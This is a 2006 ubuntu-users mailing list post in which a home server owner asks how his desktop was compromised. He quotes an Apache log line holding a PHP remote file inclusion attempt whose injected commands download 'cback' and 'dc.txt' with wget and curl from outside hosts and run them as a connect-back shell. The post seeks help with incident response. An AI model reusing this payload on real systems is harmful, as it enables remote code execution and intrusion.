My home desktop was compromised, but how?
- From: "Carthik Sharma" <carthik@xxxxxxxxx>
- Date: Tue, 28 Feb 2006 15:44:21 -0500
Hi,
I run an apache, ssh server from my home computer. I have not
installed any php scripts whatsoever. All there are are text files,
and the odd html file.
Somebody seems to have hacked into my desktop/server. I find files in
the /tmp/ (like "agent.8213)directory which I cannot open, these are
setuid-ed -- how do I open these?
In my apache access logs, there are things like
"http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|"
That above is a valid url, and will take you to a script to deface
someone's php script etc, I suppose. Now, how did this malicious
hacker get in my computer?
(The full line is :
192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)" )
How would I go about tracing how this incident happened?
Any server/security admins here that can help me with a little
patience? I really want to get to the root of this and find out why
whatever happened happened.
None of the passwords for the ssh accounts are dictionary words, in
fact all are combinations of letters, numbers and sometimes special
symbols.
I have done nothing special to modify apache, or the ssh daemon, in
fact, sshd listens on port 8888.
I could paste logs here, but they would be too long. For now, I have
stopped the apache and ssh servers.
Any help will be most welcome. My security bubble just burst :(
Carthik.
--
ubuntu-users mailing list
ubuntu-users@xxxxxxxxxxxxxxxx
https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
- Follow-Ups:
- Re: My home desktop was compromised, but how?
- From: Dennis Kaarsemaker
- Re: My home desktop was compromised, but how?
- From: Michael J. Lynch
- Re: My home desktop was compromised, but how?
- Prev by Date: Re: can't open hda1 icon on desktop
- Next by Date: Re: [Dapper] How to get mounted disk show on the desktop
- Previous by thread: More Fun with Unmet Dependencies
- Next by thread: Re: My home desktop was compromised, but how?
- Index(es):
Relevant Pages
|
